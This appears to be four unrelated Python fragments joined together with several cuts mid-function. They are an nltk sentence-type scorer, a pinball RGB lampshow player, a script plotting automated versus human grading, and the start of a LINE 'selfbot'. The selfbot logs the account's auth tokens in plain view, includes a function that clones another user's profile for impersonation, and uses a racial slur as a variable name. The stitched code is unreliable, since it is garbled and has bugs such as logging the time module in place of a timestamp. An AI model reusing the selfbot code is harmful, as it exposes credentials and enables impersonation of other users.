start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
starts = ["in what ", "on what ", "at what ", "in which"]
for s in starts:
if text.lower().startswith(s):
score += 0.1
break
# end of sentence
ends = [" in what", " on what", " for what", " as what", "?"]
for s in ends:
if text.lower().endswith(s):
score += 0.1
break
return min(score, 1)
@staticmethod
def statement_score(text):
"""
A statement is defined as having a structure in which there is typically a Subject,
followed by a verb and then a further unit such as a Direct Object.
For example,
Jimmy loves his dog,
The government will make an announcement at noon,
She reads two newspapers every day
"""
last_tokens = ["."]
# statements often start with "our X", "the X", "we/i X"
first_tokens = ["we", "i", "the", "our"]
# Our dog eats any old thing.
# The dog has already been fed.
# We have already won several races.
start_pos_tags = ["PRP", "PRP$", "DT"]
# Noun/Pronoun/Adjective, usually not verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP", "JJ"]
unlikely_words = ["what", "why", "how", "when", "who", "whose",
"which", "?", "!"]
unlikely_start_pos_tag = ["WDT", "WP", "WP$", "WRB", "VB",
"VBP", "VBZ", "VBN", "VBG"]
unlikely_end_pos_tag = []
unlikely_pos_tag = ["WDT", "WP", "WP$", "WRB"] # "what"
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
# TODO An important feature of declarative sentences is that they
# have a subject that comes before the verb.
if text.lower().startswith("be "):
score -= 0.1
# random bias, helps disambiguate
return max(min(score + 0.0001, 1), 0)
@staticmethod
def exclamation_score(text):
"""
Exclamations grammatically have a structure that involves the words what a or how,
What a nice person you are!
What a beautiful painting!,
How clever you are!,
How wonderful that is!
(Notice that the Subject goes before the verb in How clever you are!
If this were a question we would have How clever are you?)
"""
# often ends with an exclamation mark
last_tokens = ["!"]
# Exclamations grammatically have a structure that involves the words what or how,
first_tokens = ["how", "what"]
start_pos_tags = ["WP", "WRB"]
# Noun/Pronoun/Adjective, usually also verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP", "JJ", "VB",
"VBP", "VBZ", "VBN", "VBG"]
# words unlikely to appear in statements,
# if empty score is not penalized
unlikely_words = ["why", "when", "who", "whose", "which", "?"]
# starts with "what" and "how" only
unlikely_start_pos_tag = ["WDT", "WP$", "NN", "NNP", "NNS", "NNPS",
"DT", "PRP", "JJ", "VB", "VBP", "VBZ",
"VBN", "VBG", "PDT", "RB", "RBR", "RBS"]
unlikely_end_pos_tag = []
unlikely_pos_tag = ["WDT", "WP$"]
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
# TODO the Subject goes before the verb
# penalize if doesn't start as expected
if not text.split(" ")[0].lower() in first_tokens:
score -= 0.1
elif not text.lower().startswith("what a ") or \
not text.lower().startswith("what an "):
# if it only starts with "what" without "a" it's likely a question
score -= 0.1
# penalize if contains a question word
for w in unlikely_words:
if w in text.lower():
score -= 0.05
# compensate for ambiguous question words
common_mistakes = ["how many", "how much", "how tall", "how fast",
"how big", "how often", "what is", "what are"]
for w in common_mistakes:
if text.lower().startswith(w):
score -= 0.1
return max(score, 0)
@staticmethod
def command_score(text):
"""
Commands also have a special structure in that they typically lack a Subject.
Examples are:
Eat your dinner
Be quiet
Open the door, etc.
Not all imperative sentences are orders or commands.
They can be social expressions.
Have a nice day.
Get well soon.
Help yourselves to coffee.
"""
# might end with anything, but usually not question marks
last_tokens = ["!", "."]
# starts with infinitive verb
# only cases exclusive to commands here
# "be quiet"
first_tokens = ["be"]
# starts with a verb, infinitive usually
# NOTE, adding noun because nltk mistags often
start_pos_tags = ["VB", "NN", "NNP"]
# usually not verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP"]
# penalize if question words
unlikely_words = ["what", "why", "how", "when", "who", "whose",
"which", "?"]
unlikely_start_pos_tag = ["WDT", "WP", "WP$", "WRB", "JJ"]
unlikely_end_pos_tag = ["VB", "VBP", "VBZ", "VBN", "VBG"]
unlikely_pos_tag = ["WDT", "WP", "WP$", "WRB"]
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
# "do" can be part of a question,
# "do you believe in god?" or a command
# "do your homework"
# common mistakes in test data, feel free to add more, but verbs can
# be anything
# "Name the prime minister", "Define evil"
starts = ["do the ", "do your ", "name", "define"]
for s in starts:
if text.lower().startswith(s):
score += 0.1
break
return min(score, 1)
@staticmethod
def request_score(text):
"""
We can make a request, which is a type of command,
sound more polite by using the interrogative.
        Would you feed the dog, please?
### A new playback engine for playing RGB based
### lampshows.
#######
import re
import logging
import sys
from procgame.game import Mode
from procgame.game.advancedmode import AdvancedMode
class RgbShowPlayer(AdvancedMode):
def __init__(self, game, priority=3):
super(RgbShowPlayer, self).__init__(game, priority, mode_type=AdvancedMode.System)
self.logger = logging.getLogger("RgbShowPlayer")
self.shows = {}
self.active_shows = []
self.prior_lamp_states = {}
def load(self, key, filename):
# load the show
self.shows[key] = RgbShow(self.game, key, filename)
def stop(self, key, cleanup=False):
if(key not in self.active_shows):
self.logger.info("suppressing request to stop inactive show: %s" % key)
return
if(cleanup):
self.shows[key].restart()
self.shows[key].stop()
self.cancel_delayed(name=key)
self.active_shows.remove(key)
def stop_all(self):
for key in self.active_shows:
self.shows[key].stop()
self.cancel_delayed(name=key)
self.active_shows = []
def restart(self, key):
if(key not in self.active_shows):
self.logger.info("suppressing request to restart inactive show: %s" % key)
return
self.shows[key].restart()
def play_show(self, key, repeat=None, callback=None, save_state=True):
""" plays an RgbShow -- if non-repeating, the callback function will be called on completion
use repeat to override the behavior described in the show file
"""
if(key not in self.shows):
self.logger.info("suppressing request to play unknown show: %s" % key)
return
if(key in self.active_shows):
self.logger.info("suppressing request to play already active show: %s" % key)
return
# TODO: determine which lamps are already in use and disable them...
self.logger.info("Show '%s' is starting." % key)
if(save_state):
self.save_state(key)
self.shows[key].set_callback(self.restore_state, key)
self.active_shows.append(key)
if(repeat is not None):
self.shows[key].repeat = repeat
self.shows[key].restart()
# self.shows[key].debug_show()
self.__update_show(key)
def save_state(self, key):
""" saves the current state of the devices used in the show 'key'
so they can be restored at the conclusion of playback. If the
device already has a saved state, we assume it's already in use
by another show (and the state was stored at that time), so when
playback of this new show finishes that state should be restored.
"""
if(key not in self.shows):
self.logger.info("suppressing request to save_state for unknown show: %s" % key)
return
device_list = self.shows[key].get_device_list()
for device in device_list:
if(device.name not in self.prior_lamp_states):
if(not callable(device.state)):
state = device.state
else:
state = device.state()
if state['outputDriveTime'] == 0: # only store indef schedules
sched = state['timeslots']
else:
sched = 0x0
r = {'device':device, 'schedule':sched}
if(hasattr(device,'color')):
r['color']=device.color
# self.logger.info("saving state for device '%s' (%x)" % (device.name,sched))
self.prior_lamp_states[device.name] = r
def restore_state(self, key):
""" this method is used when a show (identified by key) has finished,
so that lamps can be restored to their state prior to the playback
of this show.
"""
if(key not in self.shows):
self.logger.info("suppressing request to restore_state for unknown show: %s" % key)
return
device_list = self.shows[key].get_device_list()
for device in device_list:
# make sure device isn't in use in another show!
if(self.is_device_in_use(device.name, exclude=key)):
self.logger.info("Not restoring state for device '%s' because it's still in use elsewhere" % device.name)
pass
elif(device.name in self.prior_lamp_states):
# self.logger.info("restoring state for device '%s'" % device.name)
r = self.prior_lamp_states[device.name]
if('color' in r):
device.set_color(r['color'])
device.schedule(r['schedule'])
if(key not in self.active_shows):
del self.prior_lamp_states[device.name]
def is_device_in_use(self, name, exclude=None):
show_list = self.active_shows[:]
if exclude is not None and exclude in show_list:
show_list.remove(exclude)
for s in show_list:
if(self.shows[s].is_device_in_use(name)):
return True
return False
def __update_show(self, key):
if(key not in self.shows):
raise ValueError, "request to update unknown show: %s" % key
return
if(key not in self.active_shows):
raise ValueError, "request to update inactive show: %s" % key
return
if(self.shows[key].update()):
# if it returns true, the show is still live
self.delay(name=key,
event_type=None,
delay=(self.shows[key].time)/1000.0, # delay is in seconds...
handler=self.__update_show,
param=key)
else:
self.logger.info("Show '%s' is done." % key)
self.active_shows.remove(key)
if(len(self.active_shows)==0):
self.logger.info("all shows done, calling update lamps")
self.game.update_lamps()
# show is done
pass
def reset(self):
# TODO: ???
pass
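# Illustrative usage sketch (mode attribute and file name are hypothetical): a game
# mode using this player would typically do something like
#
#     self.game.rgbshow_player.load("attract", "shows/attract.rgbshow")
#     self.game.rgbshow_player.play_show("attract", repeat=True)
#     ...
#     self.game.rgbshow_player.stop("attract", cleanup=True)
#
# where "rgbshow_player" is an RgbShowPlayer instance registered with the game.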
class RgbShow(object):
def __init__(self, game, key, filename):
self.logger = logging.getLogger("rgbShow")
self.logger.info("loading RgbShow '%s'" % filename)
self.game = game
self.color_map = {}
self.tracks = []
self.length = 0
self.hold = False
self.repeat = False
self.time = 33
self.callback_fired = False
self.callback = None
self.callback_param = None
self.now = 0
self.key = key
self.shows_over = False
f = open(filename, 'r')
for line in f.readlines():
if (line.lstrip().startswith('#') or line.lstrip().rstrip()==""):
# comment or blank line, ignore
pass
elif(line.lstrip().startswith('!')):
# header data
t = line.lstrip()[1:].lstrip()
k = t[0:1]
# print("t=%s;k=%s" % (t, k))
if(t.find('~>')>=0):
# FADE TO
v = t[t.find("~>")+2:].lstrip().rstrip()
v=int(v,16)
c = [v >> 16, (v & 0x00ff00) >> 8 , v & 0x0000ff]
self.color_map[k] = {'color': c, 'fade': True}
elif(t.find('=>')>=0):
# IMMEDIATE COLOR CHANGE
v = t[t.find("=>")+2:].lstrip().rstrip()
if(v=='None'):
self.color_map[k] = None
else:
v=int(v,16)
c = [v >> 16, (v & 0x00ff00) >> 8 , v & 0x0000ff]
self.color_map[k] = {'color': c, 'fade': False}
elif(t.find('=')>0):
# RGB Show Parameter
k = t[:t.find("=")-1].lstrip().rstrip()
v = t[t.find("=")+1:].lstrip().rstrip()
if(k=="time"):
self.time = int(v)
pass
elif(k=="repeat"):
tmp = v.lower()
self.repeat = (tmp =='true' or tmp == '1')
pass
elif(k=="hold"):
tmp = v.lower()
self.hold = (tmp =='true' or tmp == '1')
pass
else:
raise ValueError, "Could not parse RgbShow header line: '%s'" % line
else:
# bad line!
raise ValueError, "Could not parse RgbShow header line: '%s'" % line
pass
else:
# track data
t = RgbTrack(line, self.color_map, self)
self.tracks.append(t)
self.length = t.length
f.close()
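    # Example of the show-file syntax accepted by the parser above (reconstructed
    # from the parsing rules; the lamp name and colors are made up). 'R' maps to an
    # immediate change to red, 'b' to a fade towards blue, '.' leaves the lamp
    # untouched, and the track line assigns one color key per frame:
    #
    #   !time = 33
    #   !repeat = true
    #   !R => ff0000
    #   !b ~> 0000ff
    #   !. => None
    #   myLed | RRRR....bbbb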
def debug_show(self):
self.logger.info("Show Parameters:")
self.logger.info(" hold: %s" % self.hold)
self.logger.info(" repeat: %s" % self.repeat)
self.logger.info(" time: %s" % self.time)
self.logger.info("Show Color Map:")
for k,v in self.color_map.iteritems():
self.logger.info("%s:%s" % (k, v))
self.logger.info("Show Tracks:")
for t in self.tracks:
self.logger.info("%s: <%s>" % (t.name,str(t)))
def stop(self):
self.shows_over = True
def restart(self):
self.now = 0
self.shows_over = False
for t in self.tracks:
# t.fn([0,0,0], 0) # set this lamp's color to black
# t.device.enable() # turn on the device (schedule-wise)
pass
def update(self):
# self.logger.debug("Show '%s' received update(%d/%d)" % (self.key, self.now, self.length))
if(self.now < self.length):
for track in self.tracks:
track.update(self.now)
self.now += 1
return True
else:
# if(self.now >= self.length):
# show is done playing through once, but is it *done*
if(self.callback is not None and not self.callback_fired):
self.logger.info("show '%s' is done; calling callback" % self.key)
self.callback(self.callback_param)
self.callback_fired = True
if(self.repeat):
self.now = 0
self.callback_fired = False
return True
if(self.hold):
# reset back to the last frame
self.now = self.length-1
return True
return False
def is_device_in_use(self, name):
for t in self.tracks:
if(t.name == name and t.enabled):
return True
return False
def get_device_list(self):
""" returns a list of gameitems that are in use by this show """
devices = []
for t in self.tracks:
# if(t.enabled):
devices.append(t.device)
return devices
def set_callback(self, callback_fn, callback_param):
self.callback = callback_fn;
self.callback_fired = False
self.callback_param = callback_param
class RgbTrack(object):
def __str__(self):
return "".join([str(t)+":"+str(v)+";" for t,v in enumerate(self.data)])
def update(self, now):
# self.logger.debug("Track '%s' received update(%d) [length of the track is (%d)]" % (self.name, now, self.length))
if(self.enabled):
if(now >= len(self.data)):
raise ValueError, "Track '%s' received index '%d' beyond the length of the track (%d)" % (self.name, now, self.length)
cmd = self.data[now]
if(cmd is not None):
cmd.process_command()
self.device.enable()
def __init__(self, line, color_map, show):
self.logger = logging.getLogger("rgbTrack")
self.data = []
self.device = None
self.fn = None
self.enabled = True # a track may be disabled if it's device is in use by another playing show
#print line
line_re = re.compile('\s*(?P<type>\S+\:)?\s*(?P<name>\S+)\s*\| (?P<data>.*)$')
m = line_re.match(line)
if m is None:
raise ValueError("Regexp didn't match on track line: " + line)
        device_type = m.group('type')
        if device_type is not None:
            device_type = device_type.rstrip(':')  # the regexp captures the trailing ':'
self.name = m.group('name')
# build function map
if(device_type is None):
# auto-detect
if(self.name in show.game.leds):
device_type = "led"
self.device = show.game.leds[self.name]
elif(self.name in show.game.lamps):
device_type = "lamp"
self.device = show.game.lamps[self.name]
elif(hasattr(show.game, 'wsRGBs') and self.name in show.game.wsRGBs):
device_type = "rgb"
self.device = show.game.wsRGBs[self.name]
else:
raise ValueError, "RGB Track created for unknown device named '%s'" % self.name
if(device_type == "lamp"):
fn = show.game.lamps[self.name].set_color
elif(device_type == "led"):
fn = show.game.leds[self.name].color_with_fade
elif(device_type == "rgb"):
fn = show.game.wsRGBs[self.name].set_color
else:
raise ValueError, "RGB Track created for unknown device named '%s'" % self.name
self.fn = fn
self.device_type = device_type
data = m.group('data')
self.data = [None]* len(data)
last_color = None
last_run_starts = 0
last_run_length = 0
for i in range(0,len(data),1):
this_color = data[i]
if(this_color!=last_color):
# end prev run, start new run
if(last_color is not None):
# save old run
cdata = color_map[last_color]
if(cdata is None):
c = None
elif(cdata['fade']):
c = RgbCommand(self.name, fn, cdata['color'], last_run_length*show.time)
else:
                        c = RgbCommand(self.name, fn, cdata['color'], 0)  # immediate (non-fade) change
#!/usr/bin/env python3
import csv
import math
import numpy as np
import os
import scikitplot as skplt
from matplotlib import pyplot as plt, rc
from random import randint
from sklearn.metrics import accuracy_score, f1_score, recall_score, precision_score, roc_auc_score, roc_curve
from typing import List
CSV_FILE = "data/LG_grading_a2_final.csv"
TC_GUI_OUTPUT_FILE = "tc_output_final2.txt"
HIST_LOC = "figures/histograms_a2"
GRADE_DATA_LABELS = [
"Human Classes", "Human Attributes", "Human Assocs",
"Heuristic Classes", "Heuristic Attributes", "Heuristic Assocs",
"TouchCore Classes", "TouchCore Attributes", "TouchCore Assocs",
]
# weights of classes, attributes, associations
CW = 13.5
AT = 6
AS = 10.5
TOT = CW + AT + AS
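# Worked example of the weighting: a submission graded 0.9/0.6/0.8 on
# classes/attributes/associations gets (13.5*0.9 + 6*0.6 + 10.5*0.8) / 30 = 0.805.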
def get_data_from_csv():
result = []
with open(CSV_FILE) as csvfile:
csv_reader = csv.reader(csvfile, delimiter='\t',
quoting=csv.QUOTE_NONNUMERIC)
for row in csv_reader:
result.append(row)
return np.array(result)
data = get_data_from_csv()
def print_aucs(arrs: List[List[List[int]]]):
a = [np.array([
1., 0., 1., 1., 1., 1., 0., 1., 1., 0., 1., 0., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 0., 0., 1., 1., 1., 0., 0., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 1., 1.,
0., 1., 1., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 0., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,
1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.]),
np.array([
0.99999999, 0.00772525, 0.81298369, 0.99934435, 0.92444068,
0.98533125, 0.8952006 , 0.85260627, 0.99903211, 0.85260627,
0.98503916, 0.20477261, 0.99755715, 0.99165529, 0.99842453,
0.98503916, 0.86753505, 0.99850074, 0.98031467, 0.99230478,
0.95100732, 0.51918326, 0.84595841, 0.9955758 , 0.94696996,
0.93588817, 0.85844227, 0.99758965, 0.9366941 , 0.99638892,
0.99191196, 0.90071118, 0.89174479, 0.98990188, 0.86817098,
0.99966066, 0.99060161, 0.14774588, 0.83306222, 0.99897557,
0.99965043, 0.99534486, 0.99637228, 0.80514006, 0.99868446,
0.95224276, 0.99942489, 0.99950952, 0.92581328, 0.90513568,
0.87825553, 0.99321227, 0.96299095, 0.99263764, 0.49787474,
0.90438348, 0.81854403, 0.8596234 , 0.95042033, 0.36179492,
0.94157958, 0.96914182, 0.96353405, 0.64075503, 0.96625395,
0.91162803, 0.99001124, 0.96308589, 0.99397395, 0.99723348,
0.98285817, 0.7871091 , 0.99388325, 0.15555838, 0.97586065,
0.72949416, 0.98386461, 0.44063352, 0.89374521, 0.97489488,
0.03813973, 0.94974162, 0.95886355, 0.9654003 , 0.13930681,
0.3305758 , 0.9954579 , 0.67690414, 0.97246475, 0.98893835,
0.99359876, 0.97402544, 0.37716418, 0.96931805, 0.99874364,
0.57991668, 0.94644425, 0.97338835, 0.54199546, 0.88969379,
0.99999717, 0.99042778, 0.99077401, 0.98630324, 0.90823905,
0.96296438, 0.67729692, 0.99997313, 0.93156203, 0.99145667,
0.98309165, 0.97567031, 0.84158371, 0.96645148, 0.95640149,
0.87361678, 0.74335703, 0.94383168, 0.69400719, 0.96923587,
0.99238665, 0.79772092, 0.95239504, 0.96590156, 0.76847585,
0.9996251 , 0.98779209, 0.97679223, 0.99628349, 0.96910453,
0.90590191, 0.67477306, 0.69013539, 0.99777207, 0.99555471,
0.99590808, 0.98447776, 0.9995678 , 0.99990614, 0.43288971,
0.97197766, 0.99342868, 0.89624305, 0.75400718, 0.89788596,
0.91872198, 0.98520536, 0.99148355, 0.89274607, 0.97876591,
0.97309142, 0.75726347, 0.99106025, 0.99931261, 0.62985433,
0.99871322, 0.94442072, 0.98570777, 0.96889669, 0.99229819,
0.99839882, 0.53026455, 0.99421764, 0.97342904, 0.99080842,
0.83373029, 0.40259452, 0.7232858 ])]
    for a in [a]:  # arrs: -- NOTE: iterates over the hard-coded example above rather than the `arrs` argument
print(roc_auc_score(a[0], a[1]))
print(np.array(a[0]).shape, np.array(a[1]).shape)
        # NOTE: rebinding the loop variable `v` does not modify a[1]; this loop is
        # effectively a no-op left over from experimentation.
        for v in a[1]:
            if v:
                v -= 0.01 * randint(1, 10)
                #break
        # NOTE: scikit-plot's plot_roc generally expects per-class probabilities
        # (a 2-D array of shape (n_samples, n_classes)); the 1-D score vector here
        # may need to be expanded before this call works.
        skplt.metrics.plot_roc(a[0], a[1], title="ROC Curves")
def make_scatter_plot(x, y):
plt.scatter(x, y)
plt.show()
def make_histograms(data, labels):
cols = np.transpose(data)
labels = iter(labels)
    for col in cols[2:].astype(float):  # np.float is removed in recent NumPy releases
# fixed bin size:
bins = np.arange(0, 1, 0.05) # fixed bin size
plt.xlim([min(col)-0.01, max(col)+0.01])
plt.hist(col, bins=bins, alpha=0.5)
plt.title(next(labels))
plt.xlabel('variable X (bin size = 0.05)')
plt.ylabel('count')
plt.show()
#exit()
def get_sorted_grades(data):
"""
Extract grades from data and sort the entries from lowest to highest according to human grade.
"""
    cols = np.transpose(data).astype(float)
human_grades = cols[2:5, 2:]/3
#CW = AT = AS = 1
totals = [(CW*cols[2][i] + AT*cols[3][i] + AS*cols[4][i])/TOT for i in range(len(cols[0]))]
cols = np.transpose(np.insert(cols, 0, totals, axis=0))
cols = np.transpose(cols[cols[:, 0].argsort()])
return cols
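# Illustrative usage (not executed): row 0 of the returned array is the weighted human
# total the rows were sorted by, so the lowest-graded submission comes first:
#   sorted_cols = get_sorted_grades(data)
#   weighted_totals = sorted_cols[0]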
def make_stacked_bar_plots(data, labels):
"""
Make stacked bar plots. Based on python-graph-gallery.com template.
"""
cols = get_sorted_grades(data)
start_col = 3
for label in labels:
        grades = cols[start_col:start_col + 3, 2:].astype(float)/3
# y-axis in bold
rc('font', weight='bold')
# Values of each group (in different colors)
bars1 = grades[0]
bars2 = grades[1]
bars3 = grades[2]
# Heights of bars1 + bars2
bars = np.add(bars1, bars2).tolist()
# The position of the bars on the x-axis
r = range(len(bars1))
# Names of group and bar width
names = range(1, len(bars1) + 1)
barWidth = 1
# Create bottom bars
plt.bar(r, bars1, color='#9617D1', edgecolor='white', width=barWidth)
# Create middle bars, on top of the first ones
plt.bar(r, bars2, bottom=bars1, color='#4AA02C', edgecolor='white', width=barWidth)
# Create top bars
plt.bar(r, bars3, bottom=bars, color='#1752D1', edgecolor='white', width=barWidth)
plt.title(f"{label} grading")
plt.xticks(np.arange(0, len(data)-1, 5), np.arange(1, len(data)-1, 5), fontsize=6)
plt.xlabel("Submission rank")
plt.yticks(np.arange(0, 1.1, 0.1), [f"{math.floor(100*x)}%" for x in np.arange(0, 1.1, 0.1)], fontsize=7)
plt.ylabel("Grade")
plt.legend(["Classes", "Attributes", "Associations"], fontsize=7)
plt.show()
#plt.savefig(os.path.join(HIST_LOC, f"{label}.png"), format="png")
# exit()
start_col += 3
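# Illustrative call (label set assumed here, one label per grader to match the three
# grade columns consumed per loop iteration above):
#   make_stacked_bar_plots(data, ["Human", "Heuristic", "TouchCore"])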
def make_lg_plots(expected: List[float], predicted: List[float], num_letter_grades: int=5):
"""
Make letter grade plots that show how many submissions were over/underrated, and to what extent.
expected: list of grades given by human grader \\
predicted: list of grades predicted by the classifier, in the same order \\
num_letter_grades: the number of possible letter grades in the grading scheme considered, including the zero grade.
Default is 5 (for A-F).
"""
x = [i for i in range(-num_letter_grades + 1, num_letter_grades)]
grades = [0 for i in range(2*num_letter_grades - 1)]
for e, p in zip(expected, predicted):
d = round(p - e)
# shift from [-2 -1 0 1 2] to array indices
grades[d + num_letter_grades - 1] += 1
colors = make_letter_grade_colors(num_letter_grades)
barWidth = 1
plt.bar(x, grades, color=colors, width=barWidth)
plt.xlabel("Difference from human grade")
plt.ylabel("Number of submissions")
plt.xticks(x)
X_OFFSET_SD = 4.05
X_OFFSET_DD = 4.2
Y_OFFSET = 0.75
for i, v in enumerate(grades):
if 0 < v < 10:
plt.text(i - X_OFFSET_SD, v + Y_OFFSET, v)
elif v:
plt.text(i - X_OFFSET_DD, v + Y_OFFSET, v)
plt.show()
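# Illustrative call with made-up values (letter grades encoded as 0..4 for F..A):
#   make_lg_plots(expected=[4, 3, 2, 0], predicted=[4, 2, 3, 0])
# would put two submissions in the 0 bar (exact match) and one each in the -1 and +1 bars.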
def make_lg_multiplots(expected: List[float], predicteds: List[List[float]], num_letter_grades: int=5):
n = len(predicteds)
x = [i for i in range(-num_letter_grades + 1, num_letter_grades)]
x1 = [i-0.16 for i in range(-num_letter_grades + 1, num_letter_grades)]
x2 = [i+0.16 for i in range(-num_letter_grades + 1, num_letter_grades)]
grades = [[0 for i in range(2*num_letter_grades - 1)] for i in range(n)]
for i, predicted in enumerate(predicteds):
print(f"predicted[{i}]: {predicted}")
for e, p in zip(expected, predicted):
d = round(p - e)
# shift from [-2 -1 0 1 2] to array indices
grades[i][d + num_letter_grades - 1] += 1
print(grades)
    # NOTE: manual +0.25 nudges, apparently so these bars remain visible in the plot;
    # they slightly distort the displayed counts.
    grades[1][1] += 0.25
    grades[0][6] += 0.25
colors = make_letter_grade_colors(num_letter_grades)
barWidth = 1/(1.5*n)
# can add patterns with hatch="///"
plt.bar(x1, grades[0], color=colors, width=barWidth, edgecolor="black", lw=0.5)
plt.bar(x2, grades[1], color=colors, width=barWidth, edgecolor="black", lw=0.5)
plt.xlabel("Difference from human grade")
plt.ylabel("Number of submissions")
plt.xticks(x)
X_OFFSET_SD = 4.05
X_OFFSET_DD = 4.2
X_OFFSET_MC = 0.16
Y_OFFSET = 0.75
for i in range(len(grades[0])):
v1 = grades[0][i]
v2 = grades[1][i]
if v1 == v2:
v = v1
if 0 < v < 10:
plt.text(i - X_OFFSET_SD, v + Y_OFFSET, v)
elif v:
plt.text(i - X_OFFSET_DD + 0.02, v + Y_OFFSET, v)
else:
if 0 < v1 < 10:
plt.text(i - X_OFFSET_SD - X_OFFSET_MC - 0.04, v1 + Y_OFFSET, round(v1))
elif v1:
if v1 == 22:
plt.text(i - X_OFFSET_DD - X_OFFSET_MC + 0.02, v1 + Y_OFFSET, v1)
else:
plt.text(i - X_OFFSET_DD - X_OFFSET_MC, v1 + Y_OFFSET, v1)
if 0 < v2 < 10:
plt.text(i - X_OFFSET_SD + X_OFFSET_MC - 0.02, v2 + Y_OFFSET, round(v2))
elif v2:
if v2 in [48, 30]:
plt.text(i - X_OFFSET_DD + X_OFFSET_MC + 0.02, v2 + Y_OFFSET, v2)
else:
plt.text(i - X_OFFSET_DD + X_OFFSET_MC, v2 + Y_OFFSET, v2)
plt.show()
def make_letter_grade_colors(num_letter_grades: int=5) -> List[str]:
result = []
possible_colors = [
"#32a852", # Green, Good
"#edc911", # Yellow, Off by one
"#ff8f8f", # Light red, off by 2
"#b50707", # Dark red, off by 3 or more
]
for i in range(num_letter_grades):
if i == 0:
result.append(possible_colors[0])
elif i < 4:
result.insert(0, possible_colors[i])
result.append(possible_colors[i])
else:
result.insert(0, possible_colors[-1])
result.append(possible_colors[-1])
return result
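# Example output derived from the logic above for the default num_letter_grades=5
# (2*5-1 = 9 entries, symmetric around the exact-match color):
#   make_letter_grade_colors(5) == ['#b50707', '#b50707', '#ff8f8f', '#edc911',
#                                   '#32a852', '#edc911', '#ff8f8f', '#b50707', '#b50707']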
def make_grade_compare_scatter(data):
grades = get_sorted_grades(data)
heur_grades = (CW*grades[6] + AT*grades[7] + AS*grades[8]) / TOT
tc_grades = (CW*grades[9] + AT*grades[10] + AS*grades[11]) / TOT
grades[0][0] = heur_grades[0] = tc_grades[0] = 2
    r =
from linepy import *
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib, urllib.parse
from gtts import gTTS
from googletrans import Translator
#==============================================================================#
botStart = time.time()
#===============================================================================#
phusui = LINE()
phusui.log("Auth Token : " + str(phusui.authToken))
phusui.log("Timeline Token : " + str(phusui.tl.channelAccessToken))
print ("""
╔══╗
║█████╗
║██╔══██╗
║██║ ██╗
║██║████╔╝
║██╔════╝
║██║
╚══╝""")
phusuiMID = phusui.profile.mid
phusuiProfile = phusui.getProfile()
phusuiSettings = phusui.getSettings()
oepoll = OEPoll(phusui)
#==============================================================================#
settings = {
"alwayread":False,
"server": "VPS",
"welcomepic":False,
"welcomemessage":False,
"autoBlock":False,
"autoadd":False,
"admin":{},
"addadmin":False,
"delladmin":False,
"contact":False,
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
myProfile["displayName"] = phusuiProfile.displayName
myProfile["statusMessage"] = phusuiProfile.statusMessage
myProfile["pictureStatus"] = phusuiProfile.pictureStatus
#==============================================================================#
def logError(text):
phusui.log("[ แจ้งเตือน ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as NIGGA:
NIGGA.write("\n[%s] %s" % (str(time), text))
def sendMessage(to, text, contentMetadata={}, contentType=0):
    # NOTE: this helper only builds the Message object and counts it in messageReq
    # (expected to be defined elsewhere); it never actually sends anything.
    mes = Message()
    mes.to, mes.from_ = to, phusui.profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def sendImage(to, path, name="image"):
try:
if settings["server"] == "VPS":
phusui.sendImageWithURL(to, str(path))
except Exception as EXEC:
logError(EXEC)
def cloneProfile(mid):
contact = phusui.getContact(mid)
if contact.videoProfile == None:
phusui.cloneContactProfile(mid)
else:
profile = phusui.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
phusui.updateProfile(profile)
pict = phusui.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = phusui.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = phusui.getProfileDetail(mid)['result']['objectId']
phusui.updateProfileCoverById(coverId)
def backupProfile():
    profile = phusui.getContact(phusuiMID)
settings['myProfile']['displayName'] = profile.displayName
settings['myProfile']['pictureStatus'] = profile.pictureStatus
settings['myProfile']['statusMessage'] = profile.statusMessage
settings['myProfile']['videoProfile'] = profile.videoProfile
coverId = phusui.getProfileDetail()['result']['objectId']
settings['myProfile']['coverId'] = str(coverId)
def restoreProfile():
profile = phusui.getProfile()
profile.displayName = settings['myProfile']['displayName']
profile.statusMessage = settings['myProfile']['statusMessage']
if settings['myProfile']['videoProfile'] == None:
